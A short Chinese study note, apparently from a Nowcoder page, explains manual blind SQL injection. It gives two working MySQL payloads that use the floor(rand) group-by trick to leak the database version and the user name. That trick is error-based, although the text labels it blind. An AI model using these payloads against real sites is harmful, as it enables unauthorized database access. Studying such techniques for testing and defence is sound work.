- 手工盲注是在不显示详细错误信息的情况下进行SQL注入的方法。例如,通过判断页面是否有变化来获取数据库信息。 - 常见的语句如: - 判断数据库版本: and 1=(select 1 from (select count(*),concat(floor(rand(0)*2),(substr((select version()),1,1))) as x from information_schema.tables group by x) a)  - 判断数据库用户名: and 1=(select 1 from (select count(*),concat(floor(rand(0)*2),(substr((select user()),1,1))) as x from information_schema.tables group by x) a)

相关推荐

牛客网
牛客企业服务